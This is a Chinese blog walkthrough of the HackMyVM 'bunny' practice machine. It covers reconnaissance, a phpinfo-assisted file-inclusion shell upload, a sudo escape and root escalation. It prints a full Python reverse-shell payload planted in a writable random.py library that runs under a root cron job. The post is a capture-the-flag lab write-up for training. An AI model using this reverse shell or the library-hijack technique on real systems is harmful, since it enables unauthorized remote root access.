hackmyvm-bunny walkthrough

最新推荐文章于 2024-11-17 01:50:27 发布
最新推荐文章于 2024-11-17 01:50:27 发布
阅读量241 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: hackmyvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xdeclearn/article/details/119479607
本文详细介绍了hackmyvm-bunny的漏洞利用过程,包括信息收集、获取shell、切换用户和提权至root。通过fuzzing发现index.php参数,利用phpinfo泄漏获取主机信息。由于没有上传点,参考外部文章实现shell上传。之后通过修改random文件以反弹shell,成功提权到root。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

hackmyvm-buny walkthrough

难度(作者评价):difficult

信息收集

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

获取shell

端口信息很少,常规操作,访问80,爆破目录。
80
fuzz1
upload.phppassword.txtconfig.php都是没有实际含义的文本文件。phpinfo.php泄露了主机的相关信息。
phpinfo
能想到的就是index.php是不是存在ssrf。于是利用ffufindex.php进行参数fuzz,得到参数page为实际请求参数。
ffuf
由于allow_url_include是off,所以没有办法进行php://inputdata协议利用。 爆破日志文件也不能被利用来进行本地文件包含获取shell。
burp
同时web服务中没有上传点,于是参考文章php文件包含漏洞(利用phpinfo)复现[1],成功上传shell。

shellupload
ant

切换用户

为了操作方便获取pty,反弹一个shell,查看sudo
www-data
magic文件如下:

#/bin/bash
$1 $2 $3 -T -TT 'sh #'

很简单切换到用户chris,得到第一个flag。
chris
userflag

提权至root

利用pspy64可以看到root每分钟在运行pendu.pypendu
该文件没做什么事情,但是引入了random
在这里插入图片描述
random
从图中可以看到random是可以修改的。于是将random改成一个反弹shell。

chris@bunny:~$ cat /usr/lib/python3.7/random.py
cat /usr/lib/python3.7/random.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("*.*.*.*",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

成功获取root权限。
root

参考

  1. https://www.cnblogs.com/xiaoqiyue/p/10158702.html
hackmyvm-hopper walkthrough
xdeclearn的博客
08-05 420
hackmyvm: hopper 信息收集到获取第一个shell PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 全端口扫描,先访问一下web服务。 利用gobuster扫描目录找到目录advanced-search,这里存在ssrf。 虚拟机有三个用户可以bash登录,root,edward,henry。 经过简单测试,不能进行远程文件包含,估计是调用的curl_exec,关于php的ssrf利用一般情况下可以参看SSRF in PH
hackmyvm入门(靶机网络配置)
Bu2n的博客
04-13 7206
hackmyvm概述hackmyvm靶机下载地址靶机网络配置测试环境环境搭建愉快玩耍 hackmyvm概述 hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。我个人觉得,hackmyvm相比vulnhub好的地方在于它的靶机所占磁盘空间小,hackmyvm靶机一般在1G左右,而vulnhub靶机动不动就2G,甚至我见过还有6G的。不扯这些了,今天是聊一聊hackmyvm到底怎么玩.
Run - hackmyvm
tanbinn的博客
04-09 674
hackmyvm的Run靶场
HackmyVM-----Boxing靶机
woshicainiao666的博客
04-18 563
发现很多的403状态码,这代表没有权限访问,通过ssrf试一下,ssrf就是服务器为跳板访问内网未授权的内容。去看网页的所有功能点,看有没有常规的漏洞,不止要用鼠标点点点,也要转包,看响应包回响。这里看了别的博主写的payload,直接可以执行命令。,像域名,先将域添加到/etc/hosts中。太难搞了,受不了,兄弟们,不打了不打了。看到响应包中响应头出现。
HackMyVM —find
Innocence_0的博客
07-24 266
发现并不存在boom目录,创建boom目录和boom.sh文件。发现并不存在boom目录,创建boom目录和boom.sh文件。提取到root,查看/root/root.txt。提取到root,查看/root/root.txt。攻击手法:Malbolge语言、sudo提权。发现存在cat.jpg和robots.txt。目标: user.txt root.txt。下载并进行对比,发现一段代码。下载并查看 cat.jpg。找到第一个user.txt。查看robots.txt。
bunny-walkthrough:使用stack.gl在屏幕上绘制3D兔子
05-25
兔子演练 使用的各种“ hello world”示例:只需使用轨道摄像机与之交互即可在屏幕上绘制3D兔子。 在此处进行详尽的评论,以逐步了解所有要素在实践中如何...cd bunny-walkthrough npm install npm start 也可以看看
The-Bunny-Hunt-crx插件
03-15
The-Bunny-Hunt-在您的生命消失之前,狩猎所有恶意的兔子! The-Bunny-Hunt-在您的生命消失之前,狩猎所有恶意的兔子! 怎么玩? 这很简单--拍摄彩色的兔子-不要拍摄黑色的兔子-当心炸弹的兔子-达到20级即可完成游戏...
reactphp-observable-bunny
05-17
composer require wyrihaximus/react-observable-bunny 用法 下面的示例将连接到RabbitMQ,使用来自queue:name队列的消息,并在取消订阅和断开客户端连接之前将预取(QOS)设置为10,持续两分钟。 <?php use ...
ACA-29--Quick-Bunny-Level-3
03-30
《 ACA-29--Quick-Bunny-Level-3:探索P5.js库在JavaScript游戏开发中的应用》 在当今数字化时代,游戏开发已经成为一种流行的艺术形式和技术实践,吸引着众多编程爱好者和设计师投身其中。"ACA-29--Quick-Bunny-...
canyon-bunny
05-09
本项目“canyon-bunny”是基于LibGDX的一个实例,旨在教授如何利用这个框架开发多平台游戏。下面,我们将深入探讨LibGDX的核心组件,以及在“峡谷兔”项目中如何应用它们。 1. **LibGDX简介** LibGDX是一个完整的...
hackmyvm之warez
qwweggfe的博客
09-03 534
0x01基本信息 地址:https://hackmyvm.eu/machines/machine.php?vm=Warez 靶机ip:192.168.181.159 keli IP:192.168.181.129 0x02实施过程 首先进行ip扫描 于是打开网页进行查看 于是我进行目录扫描 gobuster dir -u http://192.168.181.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-me..
alzheimer ---hackmyvm
m0_64253567的博客
07-23 331
hackmyvm ----alzheimer
打靶手记之hackmyvm--UnbakedPie
milu_Sec的博客
02-06 1002
关于反序列化,可能有小白还不理解,这里如果直接解释会有点过臃长了,简单来说序列化的目的是为了保存、传递和恢复对象,不同的语言有自己不同的序列化方式,这里建议小白从php的序列化开始学习,如果实在想不通,可以理解成,为了方便,把对象通过某种算法变成了一串编码,如果有师傅需要,麋鹿后期也可以针对序列化出系列专栏。相比于 PHP 反序列化必须要依赖于当前代码中类的存在以及方法的存在,python的序列化其实就是把它转换成相应的操作码,当我们进行反序列化的时候,是把那一串操作码变回来,
hackmyvm】vivifytech靶机
woshicainiao666的博客
04-29 596
http://192.168.9.164/wordpress/wp-includes/secrets.txt,文本文件,应该是用户名的密码,但是user在哪,不知道。MySQL X是一种用于MySQL数据库的新协议,它支持文档存储和异步操作,通常用于实现更高级的数据库功能。在 http://192.168.9.164/wordpress/wp-includes/中发现目录遍历。看了老外的文章,找到了user用户。在所有的.php文件中要么时空白页面被解析,要么不能访问,终于找到一个。80端口如图,扫目录。
渗透靶场——HackMyVM:Tom
tlovejr的博客
03-28 2129
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 信息收集 扫描主机 arp-scan -l 发现了存活主机的ip地址为192.168.1.69 扫描端口 扫描靶机开放的服务端口 nmap -p- -A 192.168.1.69 发现有22,80,8080端口进行开放,正常情况下我们现在先在80端口开始突破 Web渗透 http://192.
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3294
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
hackmyvm——Suidy之suid文件覆盖
m0_63641882的博客
03-21 897
1. Seclist一个非常全面的字典2. hydre工具的使用爆破3. tail和sed命令的使用4. suid覆盖进行提权后言:刚入门网安的一只小白,想把自学的学习的过程记录下来方便自己,帮助他人。可以私信博主欢迎学习交流!!!
hackmyvm-pwned靶机
最新发布
weixin_52710247的博客
11-17 459
hackmyvm-pwned靶机复现
hackmyvm System 靶机练习(最玄学的拿root经历)
Bu2n的博客
04-16 874
主机发现端口扫描漏洞挖掘权限提升 主机发现 端口扫描 漏洞挖掘 访问web,发现是一个登录表单 打开burpsuite,抓包分析,发现请求体是xml格式,立马想到XXE 发送到Repeater模块进行测试,发现email那个位置可以利用,因为他在页面上有回显 我在请求体的XML引用了外部实体,结果发现程序启用了外部实体,也就是说这里真有XXE漏洞 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!E.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值